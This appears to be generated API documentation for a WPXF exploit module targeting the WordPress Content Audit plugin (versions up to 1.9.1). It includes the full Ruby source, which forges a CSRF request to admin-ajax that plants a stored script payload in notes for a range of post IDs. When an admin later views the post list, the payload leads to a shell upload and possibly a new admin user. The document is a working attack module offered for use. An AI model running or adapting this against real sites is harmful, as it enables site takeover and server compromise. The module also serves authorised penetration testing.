Class: Wpxf::Exploit::ContentAuditCsrfStoredXssShellUpload

Inherits:
Module
  • Object
Includes:
WordPress::StagedReflectedXss
Defined in:
lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

Methods included from WordPress::StagedReflectedXss

#create_basic_post_script, #initial_req_path, #on_http_request, #run, #url_with_xss

Methods included from WordPress::ReflectedXss

#run

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute, #upload_payload_using_plugin_form

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ ContentAuditCsrfStoredXssShellUpload

Returns a new instance of ContentAuditCsrfStoredXssShellUpload.



# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 6

# Registers the module's metadata and its two user-facing options.
#
# The `desc` literal is displayed verbatim (desc_preformatted: true), so its
# line breaks and indentation are part of the text the framework prints.
def initialize
  super

  info = {
    name: 'Content Audit <= 1.9.1 CSRF Stored XSS Shell Upload',
    desc: %(
      Versions up to and including 1.9.1 of the Content Audit plugin suffer
      from a CSRF and encoding issue, allowing for a JavaScript payload to
      be stored in the notes against a page.

      This module will create a link, which when clicked by an admin, will
      store the payload against all auditable items with an ID in the specified
      range. By default, Content Audit ships with only pages audited, but posts
      can also be audited. The payload will be executed the next time an admin
      views the page / post management area, with one of the infected items
      visible in the list.

      Note: If a specified post ID has not been yet assigned a post / page, the
      payload will be stored and executed when the ID is eventually assigned to
      a new post / page.
    ),
    desc_preformatted: true,
    author: [
      'Tom Adams', # Disclosure
      'rastating'  # WPXF module
    ],
    references: [
      ['WPVDB', '8915'],
      ['URL', 'http://seclists.org/fulldisclosure/2017/Sep/73'],
      ['URL', 'https://security.dxw.com/advisories/csrf-xss-content-audit/']
    ],
    date: 'Aug 21 2017'
  }
  update_info(**info)

  # Inclusive ID range used by #initial_script; both options are required and
  # are read back through #first_post_id / #last_post_id.
  first_id_option = IntegerOption.new(
    name: 'first_post_id',
    desc: 'The first post ID to store the payload against',
    required: true,
    default: 1
  )
  last_id_option = IntegerOption.new(
    name: 'last_post_id',
    desc: 'The last post ID to store the payload against',
    required: true,
    default: 100
  )
  register_options([first_id_option, last_id_option])
end

Instance Method Details

#check ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 56

# Vulnerability check based on the plugin's readme version string.
#
# Delegates to WordPress::Fingerprint#check_plugin_version_from_readme (not
# shown here) with the plugin slug and '1.9.2', presumably the first release
# that no longer matches; the module name states <= 1.9.1 is affected.
# NOTE(review): a readme-based check depends on readme.txt being reachable —
# if it is absent or blocked, the result is presumably inconclusive, not safe.
def check
  plugin_slug = 'content-audit'
  fixed_version = '1.9.2'
  check_plugin_version_from_readme plugin_slug, fixed_version
end

#first_post_id ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 64

# Lower bound (inclusive) of the post ID range, read from the
# 'first_post_id' option registered in #initialize.
def first_post_id
  option_name = 'first_post_id'
  normalized_option_value(option_name)
end

#initial_script ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 72

# Builds the form fields for the plugin's 'content_audit_save_bulk_edit'
# action and hands them, with #vulnerable_url, to #create_basic_post_script
# (WordPress::StagedReflectedXss, not shown here).
#
# The notes field holds the script tag; the closing tag is written as
# `<\/script>` (one backslash at runtime), presumably so it does not
# terminate an enclosing script block in the generated page. One
# `post_ids[N]` field is added per ID in the inclusive
# first_post_id..last_post_id range; an inverted range adds none.
def initial_script
  owner_token = Utility::Text.rand_alphanumeric(10)
  expiry = (Date.today + 7).strftime('%Y-%m-%d')
  notes = "<script>#{xss_ascii_encoded_include_script}<\\/script>"

  base_fields = {
    'action'                         => 'content_audit_save_bulk_edit',
    '_content_audit_owner'           => owner_token,
    '_content_audit_expiration_date' => expiry,
    '_content_audit_notes'           => notes
  }

  id_fields = (first_post_id..last_post_id).each_with_index.map do |post_id, position|
    ["post_ids[#{position}]", post_id]
  end

  create_basic_post_script(vulnerable_url, base_fields.merge(id_fields.to_h))
end

#last_post_id ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 68

# Upper bound (inclusive) of the post ID range, read from the
# 'last_post_id' option registered in #initialize.
def last_post_id
  option_name = 'last_post_id'
  normalized_option_value(option_name)
end

#vulnerable_url ⇒ Object



# File 'lib/wpxf/modules/exploit/xss/stored/content_audit_csrf_stored_xss_shell_upload.rb', line 60

# Endpoint the forged request targets: the admin-ajax URL built by
# WordPress::Urls#wordpress_url_admin_ajax (not shown here).
def vulnerable_url
  endpoint = wordpress_url_admin_ajax
  endpoint
end